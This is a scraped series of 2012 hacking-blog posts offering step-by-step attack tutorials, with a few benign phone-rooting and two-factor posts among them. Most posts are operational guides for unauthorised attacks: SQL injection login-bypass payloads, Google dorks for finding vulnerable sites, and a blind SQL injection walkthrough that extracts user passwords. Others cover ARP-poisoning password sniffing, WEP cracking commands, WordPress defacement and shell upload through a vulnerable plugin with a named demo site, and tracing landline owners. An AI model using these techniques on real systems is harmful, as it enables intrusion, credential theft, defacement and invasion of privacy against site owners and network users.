Current Database:
SELECT DATABASE()

Concatenation:
SELECT CONCAT('foo','.','bar'); #Returns: foo.bar
SELECT CONCAT_WS(' ','Hello','MySQL','and','hello','world!'); #Returns: Hello MySQL and hello world!

Multi-Concat:

#Stacks the row "foo" from the table "bar" together, using the separator "
".
#Note: This operation can by default only grab 1024 bytes, and do not allow LIMIT.
#The 1024 byte limit is stored in the @@group_concat_max_len variable.

SELECT GROUP_CONCAT(foo SEPARATOR '
') FROM bar

Thanks For Visiting Indicyborg

How To Hack Using Sqli Sql Injection + Sql Injection Complete Tut

noreply@blogger.com (Akshay) — Thu, 23 Aug 2012 11:23:00 -0700

Yestarday i have posted on article on BLIND SQLI TO HACK WEBSITE Today i am posting basic of hacking that is sqlinjection

As we all know A large number of websites are vulnerable to SQL injection attacks these days.Here i am going to discuss what is SQL injection and how it is done to hack any website. Now-a-days, many noobs find an SQL error in database by automated scanners and just exploit it for fun.Even i haven't used my skills for any bad purpose. This post is about those people who don't know that their website is actually vulnerable to such attack, also i am going to tell you that how its done and how to catch this vulnerability.Due to such vulnerability a Hacker can gain access to your website within a minute.

What is SQL Injection Actually?
SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.
In simple words I must say that hacker injects certain characters in the admin authentication area and gains access as admin.

How is basic SQL injection Accomplished?

Google is very helping in hacking, due to dork technique, Now you will think that what is dork?

Dork: A search enquiry to find a website specific to an attack type etc.

A few dorks are below, which are used to find, vulnerable site:

"inurl:admin.asp"

"inurl:login/admin.asp"

"inurl:admin/login.asp"

These dorks are pasted in the search bar of google.com. and then searched to find the website.

After finding the required target, injection is accomplished, like in the login fields of admin, as password following injections are inserted:

    '1'='1' or'1'(works on 99% of sites best one by me)
    ' or '1'='1
    ' or 'x'='x

In simple words:

Username : Admin
Password : 'or'1'='1

Hit login and you are in, All the sites are not vulnerable and this is just for learning purpose, We are not responsible for any harm or damage caused.

That was just a simple tutorial to give you basic information of SQL injection. There are more advanced techniques too. But some other day i will discuss.

How to check that your website is vulnerable?

This is the most important part in hacking.

Well then, After reading the basics above you might have got the concept of SQL injection. But many tools are also available to scan your website or server for such errors in database, Note, When error occurs it means that website is vulnerable.

First Method:

Here is an online scanner:

    http://webhosting.blackoutaio.com/~sqli/

For example, If you want to scan, www.website-wamiq.com then put this in scanner bar:

    inurl:php?=id+site:website-wamiq.com

If you get:

    http://www.website-wamiq.com/product.php?id='3 <== Success

Then it means that website is vulnerable and can be exploited easily by getting the number of colums.
(Note: catid, data, num is also used in addition to id. Simply replace id with your desired value in the dork of scanner.)
Here i got screen shot of a Website with dork "data" instead of "id" vulnerable to the attack it has scanned it overall and here are results:

Second Method:

Here is an automated scanner, Which is for newbies, Just click scan and take rest.
Go to this link to get detailed information on how to find SQL vulnerability in website.
To get Acunetix vulnerability scanner Trial version go here.

Hope, Now you might be aware of SQL injections. Futher information will be posted later.

Thanks For Reading This :p

Keep Visiting :-Indicyborg

Blind Sqli Tutorial To Hack A Website

noreply@blogger.com (Akshay) — Wed, 22 Aug 2012 10:08:00 -0700

Blind Sqli is one of the most famous technique to hack a website..it is being used by many great hacker over the world to hack many banking websites as well as many popular websites.
Still today also millions of webs sites and vulnerable, can be turn down and credential information can be leaked using this "Blind Sqli" ...

Here is the complete step by step tutorial

Before going into it lets understand what is Blind Sqli?

Blind SQL Injection is used when a web application is vulnerable to an SQL injection but the results of the injection are not visible to the attacker.Mean to say The page with the vulnerability may not be one that displays data but will display differently depending on the logical statement injected. This type of attack can become time-intensive because a new statement must be crafted for each bit recovered. There are several tools that can automate these attacks once the location of the vulnerability and the target information has been established.

The steps Begins here:
Suppose That You want to Hack This website with Blind Sqli for that you have to find such type of link shown below..

http://site.com/index.php?id=5

when we execute this, we see some page and articles on that page, pictures
etc…

then when we want to test it for blind sql injection attack

http://www.site.com/index.php?id=5 and 1=1

this is always true and the page loads normally,that's ok.

now the real test

http://www.site.com/index.php?id=5 and 1=2

this is false

so if some text, picture or some content is missing on returned page then
that site is vulrnable to blind sql injection.

1) Get the MySQL version

to get the version in blind attack we use substring i.e

http://www.site.com/index.php?id=5 and substring(@@version,1,1)=4

this should return TRUE if the version of MySQL is 4.

replace 4 with 5, and if query return TRUE then the version is 5.

i.e
http://www.site.com/index.php?id=5 and substring(@@version,1,1)=5

2) Test if subselect works
when select don't work then we use subselect

i.e
http://www.site.com/index.php?id=5 and (select 1)=1

if page loads normally then subselects work.
then we gonna see if we have access to mysql.
user

i.e
http://www.site.com/index.php?id=5 and (select 1 from mysql.user limit 0,1)=1

if page loads normally we have access to mysql.user and then later we can

pull some password usign load_file() function and OUTFILE.

3). Check table and column names

This is part when guessing is the best friend
i.e.

http://www.site.com/index.php?id=5 and (select 1 from users limit 0,1)=1

(with limit 0,1 our query here returns 1 row of data, cause subselect
returns only 1 row, this is very important.)

then if the page loads normally without content missing, the table users
exits.

if you get FALSE (some article missing),
just change table name until you
guess the right one :)

let's say that we have found that table name is users,
now what we need is
column name.

the same as table name,
we start guessing. Like i said before try the
common names for columns.

i.e

http://www.site.com/index.php?id=5 and (select substring(concat(1,
password),1,1) from users limit 0,1)=1

if the page loads normally we know that column name is password (if we get
false then try common names or just guess)

here we merge 1 with the column password,
then substring returns the first
character (,1,1)

4). Pull data from database

we found table users i columns username password so we gonna pull
characters from that.

http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>80

ok this here pulls the first character from first user in table users.
substring here returns first character and 1 character in length.
ascii()

converts that 1 character into ascii value
and then compare it with simbol greater then ">" .

so if the ascii char greater then 80, the page loads normally. (TRUE)

we keep trying until we get false.

http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>95

we get TRUE, keep incrementing
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>98

TRUE again, higher

http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>99
FALSE!!!

so the first character in username is char(99). Using the ascii converter

we know that char(99) is letter 'c'.
then let's check the second character.

http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),2,1))>99

Note that i'm changed ,1,1 to ,2,1 to get the second character. (now it
returns the second character, 1 character in lenght)

http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>99
TRUE, the page loads normally, higher.

http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>107
FALSE, lower number.

http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>104
TRUE, higher.

http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>105
FALSE!!!

we know that the second character is char(105) and that is 'i'. We have
'ci' so far

so keep incrementing until you get the end. (when >0 returns false we know
that we have reach the end).

Thankz For Reading

Keep Visiting :- www.indicyborg.blogspot.in

Trace Any Number In India

noreply@blogger.com (Akshay) — Mon, 20 Aug 2012 04:28:00 -0700

Hi Readers.Im Back Again.

today im going to tell you awsm trick.
with the help of this trick or method anyone can trace or find address and other info the number.
and this method works only for landlines.im not teaching here how to find or trace mobile numbers :p

So we can start.

First take a landline number of the target.

than goto this link ----> Trace Number

See Image:

and than click on 4th topic telephone number.

See Image:

and type the number and hit enter..

yippeee you got the info.owners name,address of the number..

Thank for reading.

Keep Visiting :- www.indicyborg.blogspot.in

What Is Sniffing How To Perform Sniffing Video Tut

noreply@blogger.com (Akshay) — Wed, 15 Aug 2012 02:36:00 -0700

Well friends previously i have already posted an article on sniffing using cain
Sniffing With cain

(If you are a fresh viewer then Please go through the first tutorial)

Today i will explain little theory part on sniffing and show a video tutorial on sniffing.

WHAT IS SNIFFING?

Sniffer is piece of tool that captures the traffic flowing into and out of a computer attached to a network.

Sniffing is nothing but the technique of capturing protocols .

A sniffer attack is commonly used to grab logins and passwords that are traveling around on the network (LAN).

Sniffing can be active or passive.

HOW TO SNIFF DATA WHICH ARE CONNECTED THROUGH LAN

See This Video tutorial to gain practical knowledge.

Thankz For Reading.

Happy Hacking :p Keep Visiting :- www.indicyborg.blogspot.in

How To Do Sniffing Attack With Cain Complete Tutorial

noreply@blogger.com (Akshay) — Wed, 15 Aug 2012 02:29:00 -0700

Hello Friends And Happy Independence Day 15 August 2012 To All Our Blog Readers..

today i am explaining Sniffing the packet capturing technique.

A Sniffer is an application or device that can read, monitor, and capture network data exchanges and read network packets. If the packets are not encrypted, a sniffer provides a full view of the data inside the packet.

Using a sniffer, an attacker can do any of the following:
a) Analyze your network and gain information to eventually cause your network to crash or to become corrupted.
b) Read your communications.

UNIX users often smugly assert that the best free security tools support their platform first, and Windows ports are often an afterthought. They are usually right, but Cain & Abel is a glaring exception. This Windows-only password recovery tool handles an enormous variety of tasks.

It can recover passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols.

Sniffing LAN passwords using Cain & Abel.
(Works only for ethernet netwoks)

STEP 1- Run Cain and Abel

STEP 2-Now click on the sniffer tab, right click and select Scan MAC Addresses. You will get a window like this:

STEP 3-Check "All tests" and click OK. Cain & Abel will start scanning the MAC addresses in your subnet. This may take a couple of minutes. Once you have a list of hosts for poisoning, start the sniffer and APR (ARP Poison Routing).

STEP 4-All HTTP connections to the scanned hosts will be redirected to your computer and then from your computer will be sent to the host's computer. When the host will fill the HTTP form, the data will be sent to the server through your computer. Cain & Abel keeps a list of form field names. It will extract the values of the fields with the name matching with that in its database.

To view the captured passwords, click on the "Passwords" tab from the lower tabs and click on HTTP in the Left pane. You can see the captured username and passwords in the right pane along with the URL of the page where the password was input.

Thankz For Reading Keep Visit www.indicyborg.blogspot.in

HTC Wildfire S Rooted [Hacks]

noreply@blogger.com (Akshay) — Sat, 11 Aug 2012 04:00:00 -0700

HTC Wildfire S is all so known as HTC PG76110 which runs on Android 2.3.5 and having 600 MHz ARM 11 processor and chipset of Qulacomm MSM7227. All the users of HTC Wildfire S can now root their phone. To root the device you need to custom recovery installed in the device.

Pre-Requisites

->Unlocked bootloader of HTC Wildfire S
->Custom recovery image

->ClockworkMod Recovery 5.0.2.6 (recommended)
->Custom recovery image

1.The battery power of the Smartphone must be 80% at least, so that it keeps the device active all through procedure.
2.You must keep backups of all data separately before rooting your device.
3.Disable the firewall and anti-virus software to avoid interruption.
4.Set microSD card to FAT32 file system.

How to flash custom recovery and root your HTC Wildfire S

Step 1: Download the above links on your computer and extract the files.
Step 2: Via USB cable connect your device to your computer and transfer the PG76IMG.zip file to the phone’s SD card.
Step 3: After that detach your Smartphone from the computer and disable the Fastboot on your phone by going to Settings then power.
Step 4: Now switch off the device and reboot it to HBOOT mode by both the Volume Down and Power buttons until the screen appears.
Step 5: Wait for few seconds to detect the recovery image by phone and then as you see the message to start update, use the volume up key to initiate update.
Step 6: Press the Power button to reboot the phone after the installation is complete.
Step 7: Use the USB cable to connect your device after it gets fully booted.
Step 8: From the phone’s SD card delete PG76IMG.zip file and copy the root.zip file.
Step 9: Again unplug the phone and turn off the device.
Step 10: Hold the Volume Down Key and Power buttons until you see HBOOT screen on phone. You must use the Volume keys for navigation and to select use Power button.
Step 11: In the recovery menu select install zip from sd card then select choose zip from sd card and finally select root.zip file.
Step 12: Confirm by selecting Yes and then the rooting procedure will start by script.
Step 13: When all get finished the go back to the main menu and then select power off.
Step 14: Power on the phone and enjoy the rooted HTC Wildfire S. Superuser, BusyBox, and su binary will also be installed along with it.

Your HTC Wildfire S is successfully rooted and installed with custom recovery. If you counter any error during Superuser app then clear all the data from it and afterwards run the application from the app drawer. It is advised to update su binary to prevent force close error in the app. You may also go for latest version of Superuser from the Google Play Store.
................................................................................
Keep Visiting :- www.indicyborg.blogspot.in

How to Root and Unroot LG Optimus S LS670 [Hacks]

noreply@blogger.com (Akshay) — Sat, 11 Aug 2012 03:51:00 -0700

The LG Optimus S is a good smartphone. The device could be considered one of those entry-level Android smartphones. It has been out for quite some time now and it has already received a lot of praise from Internet reviews and first-hand users. They claim that the Optimus S is the best smartphone in its category.

What makes this Android gadget stand out is the fact that it has a sturdy build, its 600 MHz processor is able to handle Android 2.2 very well, and it’s the cheapest among the first Sprint ID smartphones.
Since it is a Sprint ID smartphone, the LG Optimus S contains all the Sprint ID bloatware. Most of the time, the software is not really useful and many of you wish that network providers like Sprint didn’t preload such apps into their phones. But, since that is not how it works in the real world, then we just have to find some ways to remove the bloatware ourselves.
Rooting an Android device is typically the first step in removing bloatware. This process will give users more control over the device. So, if you are planning to root your LG Optimus S to get rid of Sprint ID bloatware, continue reading to know how.

Requirements

Download and install the .net Framework. Part of this utility software is needed by the rooting application. Get the .net Framework here.

The rooting application will also need the Visual C++ 2008 Redistribute Package. You can get this here.

This process will need a Windows PC which runs either Windows Vista or Windows 7.
It is also best to have a fully charged battery before you perform this process.

Instructions
1.Download the rooting application from here
2.Unzip the downloaded file to have access to the main rooting application.
3.Download and install the USB driver for the device from here. If you have successfully connected the device to your PC before, you don’t need to do this.
4.Enable USB debugging in the Optimus S. To do this, just follow this path Settings > Applications > Development and check the box for USB Debugging.
5.Connect the device to your PC via USB cable.
6.Open the notifications window on the device and make sure “USB debugging connected” is listed under “Ongoing”.
7.Go to the folder where you unzipped the rooting files. Right click on “Gingersnap.exe” and then choose “Run as administrator”.
8.Click on the Root button to complete the rooting process. And, if you just came back here to Unroot the Optimus S, then feel free to click the Unroot button.

You can now remove the bloatware on your Optimus S to free up some space and get rid of unwanted stuff. Doing this one, though, is a totally different topic. But, then again, you’re already one step closer since the device is already rooted. And, not just that–you can now do more things with your Optimus S like probably installing CyanogenMod.
...............................................................................
Keep Visiting Us :- www.indicyborg.blogspot.in

Wireless Wi-Fi Modem Network Hacking Complete Tutorial

noreply@blogger.com (Akshay) — Fri, 10 Aug 2012 05:05:00 -0700

Many of the friends ask me about how to hack wifi network .so here is the tutorial that will explain how to hack wifi.
In our daily life some time our laptop catching so many wi-fi signals but none of them is accessible..and we think “I wish I could some how break the password and access free internet”.
if you are thinking like that than this tutorial will definitely help you in cracking password of wi-fi network for free internet.

Tutorial on hacking wi-fi Network

First of all you need to scan for available wireless networks.

you can use“NetStumbler” or "Kismet" for Windows and Linux and KisMac for Mac
Below is a screenshot of NetStumbler.. It will show you a list of all the wireless access points in your range.

It’ll also show how the Wi-fi network is secured..

Now the main par comes The two most common encryption types are:

1) WEP (Wire Equivalent Privacy )

2) WAP(Wireless Application Protocol)

WEP allows a hacker to crack a WEP key easily whereas WAP is currently the most secure and best option to secure a wi-fi network

It can’t be easily cracked as WEP because the only way to retreive a WAP key is to use a brute-force attack or dictionary atack.

How to Crack WEP

This is the practically tested way to hack wi-fi network.

To crack WEP we will be using Live Linux distribution called BackTrack to crack WEP.

BackTrack have lots of preinstalled softwares but for this time

The tools we will be using on Backtrack are:

a)Kismet – a wireless network detector
b)airodump – captures packets from a wireless router
c)aireplay – forges ARP requests
d)aircrack – decrypts the WEP keys

Follow the steps One by One

1) First of all we have to find a wireless access point along with its bssid, essid and channel number. To do this we will run kismet by opening up the terminal and typing in kismet. It may ask you for the appropriate adapter which in my case is ath0. You can see your device’s name by typing in the command iwconfig.

2) To be able to do some of the later things, your wireless adapter must be put into monitor mode. Kismet automatically does this and as long as you keep it open, your wireless adapter will stay in monitor mode.

3) In kismet you will see the flags Y/N/0. Each one stands for a different type of encryption. In our case we will be looking for access points with the WEP encryption. Y=WEP N=OPEN 0=OTHER(usually WAP).

4) Once you find an access point, open a text document and paste in the networks broadcast name (essid), its mac address (bssid) and its channel number. To get the above information, use the arrow keys to select an access point and hit to get more information about it.

5) The next step is to start collecting data from the access point with airodump. Open up a new terminal and start airodump by typing in the command:

airodump-ng -c [channel#] -w [filename] –bssid [bssid] [device]

In the above command airodump-ng starts the program, the channel of your access point goes after -c , the file you wish to output the data goes after -w , and the MAC address of the access point goes after –bssid. The command ends with the device name. Make sure to leave out the brackets.

6) Leave the above running and open another terminal. Next we will generate some fake packets to the target access point so that the speed of the data output will increase. Put in the following command:

aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:55:66 -e [essid] [device]

In the above command we are using the airplay-ng program. The -1 tells the program the specific attack we wish to use which in this case is fake authentication with the access point. The 0 cites the delay between attacks, -a is the MAC address of the target access point, -h is your wireless adapters MAC address, -e is the name (essid) of the target access point, and the command ends with the your wireless adapters device name.

7) Now, we will force the target access point to send out a huge amount of packets that we will be able to take advantage of by using them to attempt to crack the WEP key. Once the following command is executed, check your airodump-ng terminal and you should see the ARP packet count to start to increase. The command is:

aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:5:66 [device]

In this command, the -3 tells the program the specific type of attack which in this case is packet injection, -b is the MAC address of the target access point, -h is your wireless adapters MAC address, and the wireless adapter device name goes at the end.
Once you have collected around 50k-500k packets, you may begin the attempt to break the WEP key. The command to begin the cracking process is:

aircrack-ng -a 1 -b [bssid] -n 128 [filename].ivs

In this command the -a 1 forces the program into the WEP attack mode, the -b is the targets MAC address, and the -n 128 tells the program the WEP key length. If you don’t know the -n , then leave it out. This should crack the WEP key within seconds. The more packets you capture, the bigger chance you have of cracking the WEP key.

Now you have learn how to hack wi-fi network.
This is the most practically way to hack wi-fi network working genuinely.Always put your try and i am sure this tutorial is helpful to you.

please share if if you like and keep viewing www.Indicyborg.blogspot.in thankyou form admin.:)

Quick Tips About Wordpress Defacing

noreply@blogger.com (Akshay) — Fri, 10 Aug 2012 04:51:00 -0700

Wordpress Defacing without uploading Shell

usually after gaining admin acess on wordpress website we upload shell on website, its takes some extra time, even you can deface wordpress's index page without uploading shell !
Goto wordpress dashboard than theme editor and you'll see 2-3 thmes there like twenty ten and twenly eleven.
Look there for active Theme on That website and edit index.php of that theme. and you'll see your deface pages on website's home Page.

Bypassing Permission Denided for index.php in wordpress

sometimes after upload shell on wordpress website when you'll try to replace index.php's socurce code in public_html/ directory with you deface page, it will show error like permission denided, can't write in file etc, and sometimes permission change dones't work, then follow the same method whic is give above, change active theme's index.php file and home will chnage with your deface page.

Simple :)

Keep Visiting www.indicyborg.blogspot.in

Two factor Authentication on wordpress

noreply@blogger.com (Akshay) — Fri, 10 Aug 2012 04:48:00 -0700

What is two factor authentication ?

Two –Factor authentication is commonly found in electronic computer authentication, where basic authentication is the process of a requesting entity presenting some evidence of its identity to a second entity. Two-factor authentication seeks to decrease the probability that the requestor is presenting false evidence of its identity .

Duo Security Overview

Duo Security provides two-factor authentication as a service built to prevent account takeover and online fraud. Protect remote access with drop-in support for most VPNs and Unix, or add login or transaction verification to any website with Duo's powerful web APIs.

Benefits using Duo Security

Compliance: Easily meet federal and industry regulations for strong authentication such as PCI DSS and HIPAA.
Cost-effective: No hardware to deploy and manage, and self- service user enrollment to reduce administrative burden.
Scalable: Duo leverages the cloud to rapidly scale as your user base grows, removing the need for onsite infrastructure.
Compatible: Integrates seamlessly with existing technology investments and end-user smartphone platforms.

The content of this Article “Two-Factor Authentication on wordpress’’ is for public to know more about it and information is provided by various sources.

Wordpress Exploit : 10,000+ Websites are Vunerable For this attack

noreply@blogger.com (Akshay) — Fri, 10 Aug 2012 04:44:00 -0700

This venerability is known as WordPress Easy Comment Upload Venerability.
Google dorks:

"inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php"
/wp-content/plugins/easy-comment-uploads/upload-form.php
Index of /wp-content/plugins/easy-comment-uploads

Open Google and enetr any dork which Given,
Now selct any website
and goto this url site.com/wp-content/plugins/easy-comment-uploads/upload-form.php
You'll Got Upload Option here :)
Now Upload Your Deface ....
and check it here site.com/wp-content/uploads/2011/05/yourfilehere

Note :- In some websites you can Upload your deface in txt on only ... and you can upload shell in 50% sites only ... upload shell in image format ex; shell.asp;.jpg

DEMO:
http://www.findthepearl.com/
http://www.findthepearl.com/wp-content/plugins/easy-comment-uploads/

Happy Hacking :p